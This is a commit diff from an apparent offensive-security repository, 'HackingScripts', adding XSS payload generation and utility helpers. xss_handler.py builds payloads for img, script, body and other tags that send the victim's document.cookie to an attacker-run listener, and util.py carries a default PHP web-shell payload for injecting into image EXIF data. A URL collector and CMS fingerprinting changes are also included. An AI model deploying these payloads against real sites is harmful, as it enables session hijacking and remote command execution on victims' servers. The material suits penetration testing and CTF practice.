Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Some more xss payloads

Browse Source
This commit is contained in:
Roman Hergenreder 2020-09-22 20:55:06 +02:00
parent 9e69b2d063
commit a086ddeb42
3 changed files with 65 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
util.py Normal file → Executable file
View File

@ -1,9 +1,14 @@
#!/usr/bin/env python
import random import random
import socket import socket
import netifaces as ni import netifaces as ni
import requests
import sys import sys
import exif import exif
import PIL import PIL
import os
from bs4 import BeautifulSoup
def getAddress(interface="tun0"): def getAddress(interface="tun0"):
if not interface in ni.interfaces(): if not interface in ni.interfaces():
@ -135,6 +140,22 @@ def exifImage(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_t
else: else:
print("Invalid output argument.") print("Invalid output argument.")
def collectUrls(input):
if not isinstance(input, BeautifulSoup):
input = BeautifulSoup(input, "html.parser")
urls = set()
attrs = ["src","href"]
tags = ["a","link","script","img"]
for tag in tags:
for e in input.find_all(tag):
for attr in attrs:
if e.has_attr(attr):
urls.add(e[attr])
return urls
if __name__ == "__main__": if __name__ == "__main__":
bin = sys.argv[0] bin = sys.argv[0]
if len(sys.argv) < 2: if len(sys.argv) < 2:
@ -172,3 +193,22 @@ if __name__ == "__main__":
_out = ".".join(_out[0:-1]) + "_exif." + _out[-1] _out = ".".join(_out[0:-1]) + "_exif." + _out[-1]
exifImage(payload, _in, _out, tag) exifImage(payload, _in, _out, tag)
elif command == "collectUrls":
if len(sys.argv) < 3:
print("Usage: %s collectUrls <url/file>" % bin)
else:
uri = sys.argv[2]
if os.path.isfile(uri):
data = open(uri,"r").read()
else:
res = requests.get(uri)
if res.status_code != 200:
print("%s returned: %d %s" % (uri, res.status_code, res.reason))
exit()
data = res.text
for item in sorted(collectUrls(data)):
print(item)
elif command == "help":
print("Usage: %s [command]" % bin)
print("Available commands:")
print(" help, getAddress, pad, collectUrls, exifImage")

20
web_service_finder.py
View File

@ -5,6 +5,7 @@ import sys
import argparse import argparse
import requests import requests
import urllib.parse import urllib.parse
from hackingscripts import util
from bs4 import BeautifulSoup from bs4 import BeautifulSoup
class WebServicecFinder: class WebServicecFinder:
@ -108,19 +109,6 @@ class WebServicecFinder:
return True return True
return False return False
def collectUrls(self, soup):
urls = set()
attrs = ["src","href"]
tags = ["a","link","script","img"]
for tag in tags:
for e in soup.find_all(tag):
for attr in attrs:
if e.has_attr(attr):
urls.add(e[attr])
return urls
def retrieveMoodleVersion(self, v): def retrieveMoodleVersion(self, v):
res = requests.get("https://docs.moodle.org/dev/Releases") res = requests.get("https://docs.moodle.org/dev/Releases")
soup = BeautifulSoup(res.text, "html.parser") soup = BeautifulSoup(res.text, "html.parser")
@ -158,9 +146,9 @@ class WebServicecFinder:
moodle_pattern_1 = re.compile(r"^https://download.moodle.org/mobile\?version=(\d+)(&|$)") moodle_pattern_1 = re.compile(r"^https://download.moodle.org/mobile\?version=(\d+)(&|$)")
moodle_pattern_2 = re.compile(r"^https://docs.moodle.org/(\d+)/") moodle_pattern_2 = re.compile(r"^https://docs.moodle.org/(\d+)/")
litecart_pattern = re.compile(r"^https://www.litecart.net") litecart_pattern = re.compile(r"^https://www.litecart.net")
wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|block-library/style.min.css)\?ver=([0-9.]+)(&|$)") wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)")
urls = self.collectUrls(soup) urls = util.collectUrls(soup)
for url in urls: for url in urls:
self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v))) self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v)))
self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10)) self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10))
@ -170,7 +158,7 @@ class WebServicecFinder:
def analyseRobots(self): def analyseRobots(self):
res = self.do_get("/robots.txt", allow_redirects=False) res = self.do_get("/robots.txt", allow_redirects=False)
if res.status_code in (301,302,404,403): if res.status_code != 200:
print("[-] robots.txt not found or inaccessible") print("[-] robots.txt not found or inaccessible")
return False return False

25
xss_handler.py
View File

@ -6,12 +6,29 @@ import http.server
import socketserver import socketserver
from http.server import HTTPServer, BaseHTTPRequestHandler from http.server import HTTPServer, BaseHTTPRequestHandler
def generatePayload(type, address, port): def getCookieAddress(address, port):
if type == "img": if port == 80:
return '<img src="#" onerror="javascript:document.location=\'http://%s:%d/?x=\'+document.cookie">' % (address, port) return "'http://%s/?x='+document.cookie" % address
else: else:
return "'http://%s:%d/?x='+document.cookie" % (address, port)
def generatePayload(type, address, port):
payloads = []
cookieAddress = getCookieAddress(address, port)
media_tags = ["img","audio","video","image","body","script","object"]
if type in media_tags:
payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress))
if type == "script":
payloads.append('<script type="text/javascript">document.location=%s</script>' % cookieAddress)
if len(payloads) == 0:
return None return None
return "\n".join(payloads)
class XssServer(BaseHTTPRequestHandler): class XssServer(BaseHTTPRequestHandler):
def _set_headers(self): def _set_headers(self):
self.send_response(200) self.send_response(200)
@ -54,7 +71,7 @@ if __name__ == "__main__":
payload = generatePayload(payload_type, local_address, listen_port) payload = generatePayload(payload_type, local_address, listen_port)
if not payload: if not payload:
print("Unsupported payload type, choose one of: img") print("Unsupported payload type")
exit(1) exit(1)
print("Payload:") print("Payload:")